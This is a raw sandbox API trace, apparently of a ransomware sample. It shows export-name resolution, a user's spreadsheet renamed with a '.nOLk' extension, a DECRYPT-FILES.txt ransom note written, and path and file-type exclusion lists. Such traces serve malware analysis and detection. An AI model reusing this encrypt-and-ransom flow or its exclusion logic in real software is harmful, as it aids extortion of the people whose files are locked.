(in: lpString1=0x3f2d468, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0084.238] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0084.238] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0084.238] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0084.238] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0084.238] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0084.238] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0084.238] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0084.238] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0084.238] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0084.238] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0084.238] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0084.238] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0084.238] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0084.238] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0084.238] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0084.238] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0084.238] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0084.238] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0084.238] lstrlenA (lpString="CREATETHREAD") returned 12 [0084.238] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0084.238] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0084.238] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0084.238] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0084.238] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0084.238] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0084.239] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0084.239] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0084.239] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0084.239] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0084.239] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0084.239] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0084.239] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0084.239] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0084.239] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0084.239] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0084.239] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0084.239] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0084.239] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0084.239] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0084.239] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0084.239] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0084.239] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0084.239] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0084.239] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0084.239] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0084.239] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0084.239] lstrlenA (lpString="CTRLROUTINE") returned 11 [0084.239] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0084.239] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0084.239] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0084.239] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0084.239] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0084.239] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0084.239] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0084.239] lstrlenA (lpString="DEBUGBREAK") returned 10 [0084.239] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0084.239] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0084.239] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0084.239] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0084.239] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0084.239] lstrlenA (lpString="DECODEPOINTER") returned 13 [0084.239] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0084.240] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0084.240] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0084.240] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0084.240] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0084.240] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0084.240] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0084.240] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0084.240] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0084.240] lstrlenA (lpString="DELETEATOM") returned 10 [0084.240] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0084.240] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0084.240] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0084.240] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0084.240] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0084.240] lstrlenA (lpString="DELETEFIBER") returned 11 [0084.240] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0084.240] lstrlenA (lpString="DELETEFILEA") returned 11 [0084.240] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0084.240] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0084.240] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0084.240] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0084.240] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0084.240] lstrlenA (lpString="DELETEFILEW") returned 11 [0084.240] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0084.240] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0084.240] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0084.240] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0084.240] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0084.240] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0084.240] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0084.240] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0084.240] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0084.240] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0084.240] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0084.240] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0084.240] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0084.240] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0084.241] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0084.241] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0084.241] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0084.241] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0084.241] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0084.241] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0084.241] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0084.241] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0084.241] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0084.241] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0084.241] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0084.241] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0084.241] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0084.241] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0084.241] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0084.241] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0084.241] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0084.241] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0084.241] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0084.241] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0084.241] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0084.241] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0084.241] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0084.241] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0084.241] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0084.241] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0084.241] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0084.241] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0084.241] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0084.241] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0084.241] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0084.241] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0084.241] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0084.241] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0084.241] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0084.241] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0084.241] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0084.242] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0084.242] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0084.242] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0084.242] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0084.242] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0084.242] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0084.242] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0084.242] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0084.242] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0084.242] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0084.242] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0084.242] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0084.242] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0084.242] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0084.242] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0084.242] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0084.242] lstrcpyW (in: lpString1=0xfb0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0084.242] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\OE QiY-.xlsx") returned 52 [0084.242] wsprintfW (in: param_1=0x3f2e120, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\OE QiY-.xlsx.nOLk") returned 57 [0084.242] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\OE QiY-.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\oe qiy-.xlsx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\OE QiY-.xlsx.nOLk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\oe qiy-.xlsx.nolk"), dwFlags=0x0) returned 1 [0084.243] VirtualFree (lpAddress=0xfa0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.243] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.243] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.244] FindNextFileW (in: hFindFile=0x5f8b98, lpFindFileData=0x3f2f150 | out: lpFindFileData=0x3f2f150*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a7a9f80, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x5c4f8e60, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x5c4f8e60, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Outlook Files", cAlternateFileName="OUTLOO~1")) returned 1 [0084.244] lstrcmpW (lpString1="Outlook Files", lpString2=".") returned 1 [0084.244] lstrcmpW (lpString1="Outlook Files", lpString2="..") returned 1 [0084.244] lstrcatW (in: lpString1="Outlook Files", lpString2="\\" | out: lpString1="Outlook Files\\") returned="Outlook Files\\" [0084.244] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpString2="Outlook Files\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\" [0084.244] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\", lpSrch="\\Program Files") returned 0x0 [0084.244] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\", lpSrch=":\\Windows") returned 0x0 [0084.244] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\", lpSrch="\\Games\\") returned 0x0 [0084.244] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\", lpSrch="\\Tor Browser\\") returned 0x0 [0084.244] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\", lpSrch="\\ProgramData\\") returned 0x0 [0084.244] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0084.244] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0084.244] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0084.244] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\", lpSrch="\\All Users") returned 0x0 [0084.244] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\", lpSrch="\\IETldCache\\") returned 0x0 [0084.244] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\", lpSrch="\\Local Settings\\") returned 0x0 [0084.244] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\", lpSrch="\\AppData\\Local") returned 0x0 [0084.244] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\", lpSrch="AhnLab") returned 0x0 [0084.244] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0084.244] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\") returned 54 [0084.244] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0084.244] wsprintfW (in: param_1=0x3f2e6b4, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\\\jkbimi8.tmp") returned 66 [0084.244] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\outlook files\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x410 [0084.245] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\") returned 54 [0084.245] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0084.245] wsprintfW (in: param_1=0x3f2e6b4, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\\\DECRYPT-FILES.txt") returned 72 [0084.245] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\outlook files\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x414 [0084.247] WriteFile (in: hFile=0x414, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2e6b0, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2e6b0*=0x23fc, lpOverlapped=0x0) returned 1 [0084.247] CloseHandle (hObject=0x414) returned 1 [0084.248] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\") returned 54 [0084.248] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\*" [0084.248] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\*", lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a7a9f80, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0xae68cb60, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xae68cb60, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8c98 [0084.248] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0084.248] FindNextFileW (in: hFindFile=0x5f8c98, lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a7a9f80, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0xae68cb60, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xae68cb60, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0084.248] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0084.248] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0084.248] FindNextFileW (in: hFindFile=0x5f8c98, lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae68cb60, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xae68cb60, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xae68cb60, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0084.248] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0084.248] FindNextFileW (in: hFindFile=0x5f8c98, lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae68cb60, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xae68cb60, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xae68cb60, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 1 [0084.248] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="DECRYPT-FILES.txt") returned 1 [0084.248] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="autorun.inf") returned 1 [0084.248] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="boot.ini") returned 1 [0084.248] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="desktop.ini") returned 1 [0084.248] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat") returned -1 [0084.248] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="iconcache.db") returned 1 [0084.248] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="bootsect.bak") returned 1 [0084.248] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat.log") returned -1 [0084.248] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="thumbs.db") returned -1 [0084.248] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="Bootfont.bin") returned 1 [0084.248] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0084.248] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0084.248] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0084.248] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 